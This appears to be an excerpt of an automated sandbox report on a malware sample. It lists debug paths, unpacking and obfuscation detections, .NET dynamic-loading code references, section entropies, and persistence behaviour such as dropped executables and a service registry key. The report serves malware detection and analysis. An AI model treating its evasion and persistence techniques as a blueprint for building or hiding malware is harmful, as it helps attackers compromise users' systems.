                      Source: OG9rNsihJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: OG9rNsihJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb( source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355319445.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355100434.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355041486.000000000541B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355698589.0000000003678000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: C:\xore salafoyukumabu3\ra.pdb source: 254E.exe, 0000001C.00000000.351672177.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355300183.0000000003672000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.356247461.0000000003672000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: AC:\xore salafoyukumabu3\ra.pdbh source: 254E.exe, 0000001C.00000000.351672177.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: [+C:\mubinidefup56_bum.pdbh source: OG9rNsihJ7.exe, 00000000.00000002.238062965.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000000.00000000.231517264.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000001.00000000.236309691.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000000.326118526.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000002.333467369.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000013.00000000.329837112.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000002.355073966.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000000.344254452.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000018.00000000.351452912.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: C:\mubinidefup56_bum.pdb source: OG9rNsihJ7.exe, OG9rNsihJ7.exe, 00000000.00000002.238062965.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000000.00000000.231517264.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000001.00000000.236309691.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000000.326118526.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000002.333467369.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000013.00000000.329837112.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000002.355073966.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000000.344254452.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000018.00000000.351452912.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: Kernel.Appcore.pdbv source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.355300183.0000000003672000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.356247461.0000000003672000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: B1B2.exe, 00000014.00000000.334478486.0000000000413000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.343212792.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: /C:\vofihewakizabu\tesuvahatu\woru.pdbh source: 3136.exe, 0000001D.00000000.359623622.0000000000401000.00000020.00020000.sdmp, 3136.exe, 0000001D.00000002.381021289.00000000008F9000.00000004.00000001.sdmp, xqfkdfcl.exe, 0000002A.00000000.380594981.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: fltLib.pdbr source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbt source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdbV source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb\ source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbZ source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb" source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdbura source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: C:\vofihewakizabu\tesuvahatu\woru.pdb source: 3136.exe, 0000001D.00000000.359623622.0000000000401000.00000020.00020000.sdmp, 3136.exe, 0000001D.00000002.381021289.00000000008F9000.00000004.00000001.sdmp, xqfkdfcl.exe, 0000002A.00000000.380594981.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001A.00000003.355319445.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355100434.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355698589.0000000003678000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: B1B2.exe, 00000014.00000000.334478486.0000000000413000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.343212792.0000000000413000.00000002.00020000.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeUnpacked PE file: 28.2.254E.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeUnpacked PE file: 29.2.3136.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeUnpacked PE file: 42.2.xqfkdfcl.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeUnpacked PE file: 28.2.254E.exe.400000.0.unpack .text:ER;.data:W;.wuxut:W;.tijayu:W;.zemoyi:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeUnpacked PE file: 29.2.3136.exe.400000.0.unpack .text:ER;.data:W;.yocinoj:W;.lebe:W;.wuno:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeUnpacked PE file: 42.2.xqfkdfcl.exe.400000.0.unpack .text:ER;.data:W;.yocinoj:W;.lebe:W;.wuno:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains potential unpackerShow sources
                      Source: 8017.exe.5.dr, Univesity_Grade_Calculator/Form1.cs.Net Code: Form1_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 2F32.exe.5.dr, CoreApi.cs.Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: 3BC6.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 30.0.3BC6.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 30.0.3BC6.exe.650000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 30.2.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 30.0.3BC6.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 30.0.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 45.0.3BC6.exe.3c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_005F3634 push es; iretd
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 18_2_00643634 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_00412CA4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_0207123C push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_0207127E push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_0207735E push esp; iretd
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_020753C8 pushfd ; retf
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 22_2_009003D8 push esi; ret
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 22_2_0090043D push esi; ret
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006D3C00 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_0042C248 push esp; retn 0042h
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_008EDE68 push 0000002Bh; iretd
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_008EB672 push ds; ret
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_00658508 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_0065764A push esp; ret
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_02954003 push esi; retf
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FACF78 pushfd ; retf
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FACF3A pushad ; retf
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FACF38 pushad ; retf
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00435870 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: 54AF.exe.5.drStatic PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
                      Source: OG9rNsihJ7.exeStatic PE information: section name: .zafif
                      Source: OG9rNsihJ7.exeStatic PE information: section name: .naladin
                      Source: OG9rNsihJ7.exeStatic PE information: section name: .ger
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name: .28gybOo
                      Source: 3A7E.exe.5.drStatic PE information: section name: .adata
                      Source: 54AF.exe.5.drStatic PE information: section name: .didata
                      Source: 6AF7.exe.5.drStatic PE information: section name: _RDATA
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name: .kujN2o2
                      Source: 7808.exe.5.drStatic PE information: section name: .adata
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name: .wZtCyLX
                      Source: 9789.exe.5.drStatic PE information: section name: .adata
                      Source: BFBD.exe.5.drStatic PE information: section name: .zafif
                      Source: BFBD.exe.5.drStatic PE information: section name: .naladin
                      Source: BFBD.exe.5.drStatic PE information: section name: .ger
                      Source: 254E.exe.5.drStatic PE information: section name: .wuxut
                      Source: 254E.exe.5.drStatic PE information: section name: .tijayu
                      Source: 254E.exe.5.drStatic PE information: section name: .zemoyi
                      Source: 3136.exe.5.drStatic PE information: section name: .yocinoj
                      Source: 3136.exe.5.drStatic PE information: section name: .lebe
                      Source: 3136.exe.5.drStatic PE information: section name: .wuno
                      Source: 2473.exe.5.drStatic PE information: section name: _RDATA
                      Source: vfgiwcs.5.drStatic PE information: section name: .zafif
                      Source: vfgiwcs.5.drStatic PE information: section name: .naladin
                      Source: vfgiwcs.5.drStatic PE information: section name: .ger
                      Source: xqfkdfcl.exe.29.drStatic PE information: section name: .yocinoj
                      Source: xqfkdfcl.exe.29.drStatic PE information: section name: .lebe
                      Source: xqfkdfcl.exe.29.drStatic PE information: section name: .wuno
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                      Source: 2F32.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x1298c
                      Source: 3BC6.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                      Source: 88E2.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x16c4f5
                      Source: 9789.exe.5.drStatic PE information: real checksum: 0x374ffe should be: 0x376ae8
                      Source: 7808.exe.5.drStatic PE information: real checksum: 0x373823 should be: 0x3738f9
                      Source: 3A7E.exe.5.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96452184589
                      Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                      Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                      Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                      Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                      Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                      Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                      Source: initial sampleStatic PE information: section name: entropy: 7.99715248044
                      Source: initial sampleStatic PE information: section name: entropy: 7.90789134233
                      Source: initial sampleStatic PE information: section name: entropy: 7.99431797903
                      Source: initial sampleStatic PE information: section name: entropy: 7.81839424264
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22755578232
                      Source: initial sampleStatic PE information: section name: .kujN2o2 entropy: 7.91856580958
                      Source: initial sampleStatic PE information: section name: entropy: 7.99718008782
                      Source: initial sampleStatic PE information: section name: entropy: 7.90089759273
                      Source: initial sampleStatic PE information: section name: entropy: 7.99420883161
                      Source: initial sampleStatic PE information: section name: entropy: 7.81503956549
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.2242765671
                      Source: initial sampleStatic PE information: section name: .wZtCyLX entropy: 7.91808927088
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96452184589
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.982589812
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96652464212
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96452184589
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96652464212
                      Source: 3BC6.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 3BC6.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 30.0.3BC6.exe.650000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 30.0.3BC6.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 30.0.3BC6.exe.650000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 30.0.3BC6.exe.650000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 30.2.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 30.2.3BC6.exe.650000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 30.0.3BC6.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 30.0.3BC6.exe.650000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 30.0.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 30.0.3BC6.exe.650000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 45.0.3BC6.exe.3c0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 45.0.3BC6.exe.3c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'

                      Persistence and Installation Behavior:

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vfgiwcsJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FC2A.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9789.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\88E2.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7808.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2473.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vfgiwcsJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeFile created: C:\Users\user\AppData\Local\Temp\xqfkdfcl.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\254E.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B1B2.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BFBD.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3BC6.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3A7E.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\45AA.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2F32.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\54AF.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6AF7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8017.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3136.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe (copy)Jump to dropped file
                      Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ffiawxs
